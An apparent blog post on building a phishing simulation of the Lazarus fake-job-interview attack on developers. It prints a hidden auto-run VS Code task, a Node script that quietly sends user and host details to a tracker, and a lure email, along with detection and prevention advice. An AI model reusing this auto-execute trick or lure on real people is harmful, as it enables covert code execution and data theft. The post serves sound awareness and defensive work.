Tags: #cybersecurity #vscode #phishing #infosec #redteam
π Table of Contents
- Introduction
- The Real Threat: Lazarus Group
- How the Attack Works
- Building the Simulation
- Technical Deep Dive
- Setting Up Your Own Campaign
- Ethical Considerations
- Detection and Prevention
- Conclusion
π¨ Introduction
In early 2026, cybersecurity researchers uncovered a sophisticated attack campaign by the North Korean APT group Lazarus, targeting developers through fake job interviews. The attack leveraged VS Code's workspace trust feature to automatically execute malicious code when developers opened seemingly legitimate project repositories.
This article demonstrates how to build a safe, educational phishing simulation based on this real-world attack vector. The goal is to raise security awareness among development teams and teach them to recognize and defend against social engineering attacks.
β οΈ Disclaimer: This project is intended strictly for educational purposes and authorized security awareness training within your organization. Unauthorized use against real targets is illegal and unethical.
π°π΅ The Real Threat: Lazarus Group
Attack Overview
Lazarus Group (also known as APT38, Hidden Cobra) is a North Korean state-sponsored threat actor known for:
- 2014: Sony Pictures hack
- 2016: Bangladesh Bank heist ($81M stolen)
- 2017: WannaCry ransomware
- 2022-2026: Targeting cryptocurrency companies and developers
The "Contagious Interview" Campaign
In their latest campaign, Lazarus operatives:
- Impersonate HR recruiters from legitimate cryptocurrency/DeFi companies
- Send attractive job offers to developers (often $180k-$220k salaries)
- Request candidates to "fix a bug" or "review code" in a GitHub repository
- Exploit VS Code's auto-task execution to compromise victims
Real-world impact:
- Theft of cryptocurrency wallet seed phrases (40+ wallet types)
- Exfiltration of browser passwords, cookies, and session tokens
- Installation of persistent backdoors
- Intellectual property theft
Reference: Contagious Interview Analysis
π How the Attack Works
The Kill Chain
graph TD
A[Attacker sends phishing email] --> B[Victim receives job offer]
B --> C[Victim clones malicious repo]
C --> D[Victim opens project in VS Code]
D --> E[VS Code shows 'Trust Authors?' dialog]
E -->|Victim clicks 'Yes'| F[.vscode/tasks.json executes]
F --> G[Malicious script runs silently]
G --> H[Data exfiltration begins]
H --> I[Victim is compromised]
The Technical Mechanism
The attack exploits VS Code's Task Auto-Run feature:
File: .vscode/tasks.json
{
"version": "2.0.0",
"tasks": [
{
"label": "Initialize Development Environment",
"type": "shell",
"command": "./scripts/malicious-script.sh",
"runOptions": {
"runOn": "folderOpen" // β οΈ Executes on folder open!
},
"presentation": {
"reveal": "never", // Hidden from user
"close": true // Auto-closes terminal
}
}
]
}
Key parameters:
-
runOn: "folderOpen"β Triggers automatically when workspace is trusted -
reveal: "never"β Hides the terminal window -
close: trueβ Closes terminal after execution
This means one click on "Trust Workspace" can execute arbitrary code without any further user interaction.
π οΈ Building the Simulation
Project Goals
- Educate developers about social engineering risks
- Demonstrate real APT tactics in a safe environment
- Measure organizational security awareness
- Provide actionable security training
Architecture Overview
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β GitHub Repository β
β (Public - Fake DeFi Company Smart Contract Challenge) β
β β
β βββ .vscode/ β
β β βββ tasks.json β Auto-run configuration β
β β βββ settings.json β
β βββ contracts/ β
β β βββ TokenVault.sol β Realistic vulnerable code β
β βββ scripts/ β
β β βββ init-workspace.js β "Malicious" payload β
β β βββ init-workspace.sh β
β β βββ init-workspace.ps1 β
β βββ test/ β
β β βββ TokenVault.test.js β
β βββ README.md β Convincing job challenge β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
β HTTPS POST
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Internal Tracking Server β
β (Private - Not included in repo) β
β β
β βββ Flask API Server β
β βββ SQLite Database β
β βββ Email Notification System β
β βββ Analytics Dashboard β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
π¬ Technical Deep Dive
Component 1: The Bait Repository
Create a realistic DeFi project with an intentional vulnerability:
contracts/TokenVault.sol (Simplified)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
contract TokenVault {
mapping(address => mapping(address => uint256)) public balances;
// β οΈ INTENTIONAL VULNERABILITY: Reentrancy
function withdraw(address token, uint256 amount) external {
require(balances[msg.sender][token] >= amount, "Insufficient balance");
// External call BEFORE state update - classic reentrancy!
IERC20(token).transfer(msg.sender, amount);
// State update happens after - attacker can re-enter
balances[msg.sender][token] -= amount;
}
}
This gives candidates a legitimate technical challenge while the real test is security awareness.
Component 2: Auto-Execution Configuration
.vscode/tasks.json
{
"version": "2.0.0",
"tasks": [
{
"label": "Initialize Development Environment",
"type": "shell",
"command": "node",
"args": ["${workspaceFolder}/scripts/init-workspace.js"],
"windows": {
"command": "powershell",
"args": ["-ExecutionPolicy", "Bypass", "-File",
"${workspaceFolder}/scripts/init-workspace.ps1"]
},
"linux": {
"command": "bash",
"args": ["${workspaceFolder}/scripts/init-workspace.sh"]
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"panel": "dedicated",
"close": true,
"echo": false
},
"problemMatcher": []
}
]
}
Component 3: The "Malicious" Payload
scripts/init-workspace.js (Educational version)
#!/usr/bin/env node
const https = require('https');
const os = require('os');
// Configuration
const TRACKER_URL = 'https://your-internal-tracker.corp/api/log';
async function collectTelemetry() {
return {
timestamp: new Date().toISOString(),
username: os.userInfo().username,
hostname: os.hostname(),
platform: os.platform(),
workspaceFolder: process.cwd(),
event: 'vscode_workspace_opened',
campaign: 'contagious-interview-2026'
};
}
async function sendToTracker(data) {
return new Promise((resolve) => {
const payload = JSON.stringify(data);
const url = new URL(TRACKER_URL);
const options = {
hostname: url.hostname,
port: url.port || 443,
path: url.pathname,
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Content-Length': Buffer.byteLength(payload)
},
timeout: 3000,
rejectUnauthorized: false
};
const req = https.request(options, () => resolve());
req.on('error', () => resolve()); // Silent fail
req.on('timeout', () => { req.destroy(); resolve(); });
req.write(payload);
req.end();
});
}
function showAwarenessNotification() {
setTimeout(() => {
const platform = os.platform();
if (platform === 'darwin') {
// macOS notification
require('child_process').execSync(
`osascript -e 'display notification "β οΈ You just executed unknown code! This was a security awareness test. Check your email." with title "π Security Test"'`,
{ stdio: 'ignore' }
);
} else if (platform === 'linux') {
// Linux notification
require('child_process').execSync(
`notify-send "π Security Test" "β οΈ You just executed unknown code! Check your email." -u critical`,
{ stdio: 'ignore' }
);
} else if (platform === 'win32') {
// Windows notification
require('child_process').execSync(
`powershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('β οΈ You just executed unknown code!\\n\\nThis was a security awareness test.', 'Security Test', 'OK', 'Warning')"`,
{ stdio: 'ignore' }
);
}
}, 5000);
}
async function main() {
try {
const telemetry = await collectTelemetry();
sendToTracker(telemetry).catch(() => {});
showAwarenessNotification();
console.log('β Development environment initialized successfully');
} catch {
console.log('β Workspace ready');
}
}
main();
Key features:
- β Collects only non-sensitive telemetry (username, hostname, timestamp)
- β Shows immediate educational notification after 5 seconds
- β Fails silently if tracking server is unavailable
- β Cross-platform support (Windows, macOS, Linux)
- β Does NOT collect passwords, tokens, or sensitive data
Component 4: The Phishing Email
From: Sarah Chen <sarah.chen@defi-innovations.io>
Subject: Senior Blockchain Developer Position - Technical Assessment
Hi [Name],
I'm Sarah, Senior Technical Recruiter at DeFi Innovations.
We're impressed with your GitHub profile and would like to offer you
a Senior Blockchain Developer position (Remote, $180k-$220k + equity).
For technical evaluation, please:
1. Clone: https://github.com/defi-innovations/smart-contract-audit
2. Find and fix the reentrancy vulnerability in TokenVault.sol
3. Submit your solution within 48 hours
We value your time and will discuss the full offer after successful completion.
Best regards,
Sarah Chen
Senior Technical Recruiter
DeFi Innovations | Building the Future of Finance
Social engineering tactics used:
- β High salary to create urgency and excitement
- β Legitimate-sounding company name
- β Technical challenge that seems reasonable
- β Time pressure (48 hours)
- β Professional tone and formatting
π Setting Up Your Own Campaign
Prerequisites
- Internal network or VPS for tracking server
- SMTP server for email notifications
- Legal approval from your organization
- HR/Management buy-in
Step 1: Clone and Customize the Repository
# Clone the simulation repository
git clone https://github.com/toxy4ny/lazarus-code.git
cd lazarus-code
# Customize the company name, branding, and challenge
# Edit README.md, package.json, etc.
Step 2: Configure the Tracking URL
Edit all payload scripts to point to your tracking server:
scripts/init-workspace.js
const TRACKER_URL = 'https://your-internal-tracker.company.local/api/log';
scripts/init-workspace.sh
TRACKER_URL="https://your-internal-tracker.company.local/api/log"
scripts/init-workspace.ps1
$TrackerUrl = "https://your-internal-tracker.company.local/api/log"
Step 3: Deploy Your Tracking Server
You'll need to implement your own tracking server. Here's the API specification:
Required Endpoints:
POST /api/log
Content-Type: application/json
{
"timestamp": "2026-01-15T10:30:00Z",
"username": "jdoe",
"hostname": "LAPTOP-ABC123",
"platform": "win32",
"workspaceFolder": "C:\\Users\\jdoe\\Projects\\defi-vault",
"event": "vscode_workspace_opened",
"campaign": "contagious-interview-2026"
}
Response: 200 OK
{
"status": "ok",
"id": 42
}
Recommended tech stack:
- Backend: Flask (Python), Express (Node.js), or FastAPI
- Database: SQLite, PostgreSQL, or MongoDB
- Email: SMTP integration with corporate mail server
- Dashboard: Simple HTML/JS or React frontend
Step 4: Push to GitHub
# Create a new organization or use existing
# Make the repository public for maximum realism
git remote add origin https://github.com/fake-company/challenge.git
git push -u origin main
Step 5: Craft Your Phishing Campaign
Email template variables:
- {{candidate_name}}
- {{candidate_email}}
- {{repository_url}}
- {{deadline}}
- {{salary_range}}
Targeting strategy:
- Start with security-aware teams (IT, DevOps)
- Gradually expand to all engineering
- Track department-wise statistics
Step 6: Launch and Monitor
# Start your tracking server
python3 tracker-server.py
# Monitor the dashboard
open http://localhost:5000/dashboard
# Send phishing emails
# (Use your organization's approved method)
Step 7: Debrief and Educate
Immediate actions (within 5 minutes):
- Show desktop notification to victim
- Send educational email with explanation
Follow-up (within 24 hours):
- Department-wide security training
- Share statistics (anonymized)
- Provide prevention guidelines
Long-term (monthly):
- Repeat campaigns with variations
- Track improvement over time
- Recognize security-conscious employees
βοΈ Ethical Considerations
Legal Requirements
β DO:
- Get written approval from legal/HR
- Include security awareness training in employee policies
- Notify employees that periodic testing will occur (without specifics)
- Anonymize data in reports
- Use only for authorized internal training
β DON'T:
- Collect real credentials, passwords, or sensitive data
- Publicly shame employees who fall for the test
- Use as grounds for termination or punishment
- Deploy without organizational approval
- Share victim data outside security team
Privacy Protection
Data collection limits:
// β
ALLOWED
{
"username": "jdoe",
"hostname": "LAPTOP-123",
"timestamp": "2026-01-15T10:30:00Z"
}
// β FORBIDDEN
{
"passwords": [...],
"ssh_keys": [...],
"browser_cookies": [...],
"crypto_wallets": [...]
}
Responsible Disclosure
After the campaign:
- Explain what happened to all participants
- Educate on how to detect similar attacks
- Provide resources for secure development
- Celebrate those who reported the suspicious email
- Iterate on training based on feedback
π‘οΈ Detection and Prevention
For Developers
π Red Flags to Watch For
- Unsolicited job offers with high salaries
- Urgent technical challenges from unknown companies
- GitHub repositories from unverified organizations
- Email domains that don't match company websites
- Pressure to act quickly without proper vetting
β Best Practices
Before opening any project:
# 1. Check the repository source
git remote -v
# Verify the domain matches the company's official website
# 2. Inspect .vscode/tasks.json
cat .vscode/tasks.json
# Look for "runOn": "folderOpen" - this is suspicious!
# 3. Check for auto-run scripts
grep -r "runOn" .vscode/
find . -name "*.sh" -o -name "*.ps1" -o -name "*.bat"
# 4. Review package.json scripts
cat package.json | grep -A 10 "scripts"
# Look for "postinstall" or other auto-run hooks
VS Code security settings:
// settings.json
{
"security.workspace.trust.enabled": true,
"security.workspace.trust.startupPrompt": "always",
"security.workspace.trust.banner": "always",
"security.workspace.trust.emptyWindow": false,
// Disable auto-task execution
"task.allowAutomaticTasks": "off"
}
Use isolated environments:
# Option 1: Docker container
docker run -it --rm -v $(pwd):/workspace node:18 bash
# Option 2: Virtual machine
# Use VirtualBox, VMware, or cloud VM
# Option 3: Windows Sandbox (Windows 10/11 Pro)
# Enable in Windows Features
For Security Teams
Detection Strategies
1. Monitor for suspicious repositories
# GitHub API search for repos with auto-run tasks
curl -H "Authorization: token YOUR_TOKEN" \
"https://api.github.com/search/code?q=runOn+folderOpen+in:file+filename:tasks.json"
2. Network monitoring
# Watch for unusual outbound connections from developer machines
# Alert on POST requests to unknown domains from code editors
3. Endpoint detection
# Monitor process trees for VS Code spawning unusual children
# Alert on: code.exe -> node.exe -> curl/powershell/bash
4. Email filtering
# Create rules for suspicious patterns:
- Job offers with GitHub links
- Emails from new/unverified crypto companies
- Urgent technical assessments
- Salary ranges in subject lines
Prevention Controls
1. Application whitelisting
# Allow only approved VS Code extensions
# Block execution of scripts from %TEMP%, Downloads, etc.
2. Network segmentation
# Restrict developer workstations from accessing:
- Cryptocurrency wallet domains
- Paste sites (pastebin, etc.)
- Anonymous file sharing services
3. Mandatory code review
# .github/workflows/security-scan.yml
name: Security Scan
on: [pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Scan for auto-run tasks
run: |
if grep -r "runOn.*folderOpen" .vscode/; then
echo "β οΈ Auto-run task detected!"
exit 1
fi
π Measuring Success
Key Metrics
# Campaign effectiveness
success_rate = (victims / total_targets) * 100
click_through_rate = (opened_emails / sent_emails) * 100
report_rate = (reported_suspicious / sent_emails) * 100
# Improvement over time
improvement = (previous_success_rate - current_success_rate) / previous_success_rate * 100
Sample Dashboard
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Campaign: Contagious Interview 2026 β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Targets: 150 employees β
β Victims: 23 (15.3%) β
β Reported: 12 (8.0%) β
β Ignored: 115 (76.7%) β
β β
β By Department: β
β Engineering: 18/100 (18%) β
β Product: 3/30 (10%) β
β Marketing: 2/20 (10%) β
β β
β Time to Click: β
β < 1 hour: 15 victims β
β 1-24 hours: 6 victims β
β > 24 hours: 2 victims β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
π Educational Materials
Post-Campaign Training
Email template for victims:
Subject: π Security Awareness Test Results
You participated in a simulated phishing attack based on real
tactics used by the Lazarus APT group.
WHAT HAPPENED:
You opened a repository and trusted the workspace, which
automatically executed a script via .vscode/tasks.json.
REAL-WORLD IMPACT:
In an actual attack, this could have resulted in:
- Cryptocurrency wallet theft
- Source code exfiltration
- Credential harvesting
- Persistent backdoor installation
HOW TO PROTECT YOURSELF:
1. Always verify the source before opening projects
2. Inspect .vscode/tasks.json for "runOn": "folderOpen"
3. Use VMs or containers for untrusted code
4. Enable VS Code's workspace trust features
5. Report suspicious job offers to security@company.com
RESOURCES:
- [Internal security wiki]
- [VS Code security guide]
- [Social engineering training]
Questions? Contact security-team@company.com
Training Workshop Outline
90-minute session:
-
Introduction (10 min)
- Real-world attack statistics
- Lazarus Group case studies
-
Live Demonstration (20 min)
- Show the attack in action
- Explain the technical mechanism
-
Hands-on Exercise (30 min)
- Participants inspect malicious repo
- Identify red flags
- Practice safe code review
-
Prevention Strategies (20 min)
- VS Code security settings
- Isolated development environments
- Email verification techniques
Q&A and Discussion (10 min)
π Resources
Official Documentation
Security Research
Similar Projects
π Conclusion
The "Contagious Interview" attack demonstrates how even security-conscious developers can fall victim to sophisticated social engineering when combined with technical exploitation. By building realistic simulations, we can:
- Educate teams about emerging threats
- Measure organizational security posture
- Improve incident response capabilities
- Foster a security-first culture
Key Takeaways
β For Developers:
- Always verify project sources before opening
- Inspect
.vscode/tasks.jsonfor auto-run configurations - Use isolated environments for untrusted code
- Report suspicious job offers immediately
β For Security Teams:
- Regular phishing simulations improve awareness
- Combine technical and social engineering testing
- Focus on education, not punishment
- Measure improvement over time
β For Organizations:
- Security awareness is everyone's responsibility
- Invest in regular training programs
- Celebrate employees who report suspicious activity
- Create a blame-free security culture
Next Steps
- Star this repository for future reference
- Customize the simulation for your organization
- Deploy your first awareness campaign
- Share your results and learnings with the community
- Contribute improvements back to this project
π€ Contributing
We welcome contributions! If you have ideas for improving this simulation:
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing-improvement) - Commit your changes (
git commit -m 'Add amazing improvement') - Push to the branch (
git push origin feature/amazing-improvement) - Open a Pull Request
Areas for Contribution
- Additional payload scripts (Python, Ruby, etc.)
- Improved notification systems
- Multi-language support
- Alternative scenarios (npm packages, browser extensions, etc.)
- Better analytics and reporting
π License
This project is licensed under the MIT License - see the LICENSE file for details.
Important Legal Notice
This software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before deploying this simulation. The authors assume no liability for misuse or unauthorized deployment.
By using this software, you agree to:
- Obtain proper authorization from your organization
- Use only in controlled environments
- Not collect sensitive personal data
- Comply with all applicable laws and regulations
- Use for security awareness training only
Acknowledgments
- Cybersecurity researchers who uncovered the original Lazarus campaign
- The VS Code team for building security features
- Security awareness professionals worldwide
β Show Your Support
If this project helped improve your organization's security awareness, please:
- β Star this repository
- π¦ Tweet about your experience
- π Write a blog post about your campaign
- π¬ Share with your security community
Together, we can make the developer community more secure! π‘οΈ
Top comments (0)